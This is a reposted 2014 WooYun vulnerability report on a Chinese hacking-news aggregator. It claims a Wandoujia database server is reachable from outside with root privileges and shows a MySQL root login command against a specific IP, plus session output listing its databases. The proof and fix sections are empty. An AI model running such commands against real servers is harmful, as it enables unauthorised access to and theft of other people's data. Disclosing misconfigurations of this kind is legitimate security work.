记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

豌豆荚某服务器数据库设置不当可被外部访问(高权限可渗透)

2014-07-31 16:25

应该是channel.wandoujia.com的



mysql -h 60.29.246.4 -uroot -p

Enter password:

Welcome to the MySQL monitor. Commands end with ; or \g.

Your MySQL connection id is 752988

Server version: 5.5.28-log MySQL Community Server (GPL)



Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.



Oracle is a registered trademark of Oracle Corporation and/or its

affiliates. Other names may be trademarks of their respective

owners.



Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.



mysql> show tables;

ERROR 1046 (3D000): No database selected

mysql> show datbases;

ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'datbases' at line 1

mysql> show databases;

+--------------------+

| Database |

+--------------------+

| information_schema |

| channelDB |

| mysql |

| performance_schema |

| qiqi_apps |

| test |

+--------------------+

6 rows in set (0.00 sec)



mysql> use mysql;

Reading table information for completion of table and column names

You can turn off this feature to get a quicker startup with -A



Database changed

mysql>

漏洞证明:

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2014-065139

阅读:69428 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“豌豆荚某服务器数据库设置不当可被外部访问(高权限可渗透)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云